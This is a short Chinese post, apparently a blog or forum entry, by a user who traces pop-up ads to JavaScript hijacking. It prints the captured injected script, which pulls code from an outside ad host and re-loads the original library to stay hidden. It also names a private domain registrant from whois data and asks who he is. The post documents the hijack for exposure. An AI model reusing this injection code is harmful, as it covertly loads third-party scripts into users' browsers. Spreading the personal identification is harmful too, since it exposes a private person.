近期访问很多网站,发现开始弹小广告了。
看了一下页面源代码,不用多说了,肯定是js劫持。
观察了这些网站,似乎没有共同点(比如使用某家的流量统计)。
哇,难道是针对不特定的js进行劫持?
赶紧抓了个包……好嘛,果然是。
(function(){try{var o='m-_-m',D=document;if(!D.getElementById(o)){var j='http://www.hikvision.com/cn/js/jQuery.md5.js',J=j+(~j.indexOf('?')?'&':'?')+new Date().getTime(),M='http://pc.quansj.cn/?cid=08',C=D.currentScript,H=D.getElementsByTagName('head')[0],N=function(s,i){var I=D.createElement('script');I.type='text/javascript';if(i)I.id=i;I.src=s;H.appendChild(I);};if(self==top){N(M,o);}if(!C){C=(function(){var S=D.scripts,l=S.length,i=0;for(;i<l;++i){if(S[i].src===j){return S[i];}}})();}C&&((C.defer||C.async)?N(J):D.write('<script src="'+J+'"><'+'/script>'));}}catch(e){}})();
whois查一下:
quansj.cn
联系人
周云鹏[whois反查]
联系邮箱
其名下注册的域名还有(经确认与劫持广告推送有关):
517m.cn
ingtoys.cn
所以问题来了,这个姓周的是何许人也?
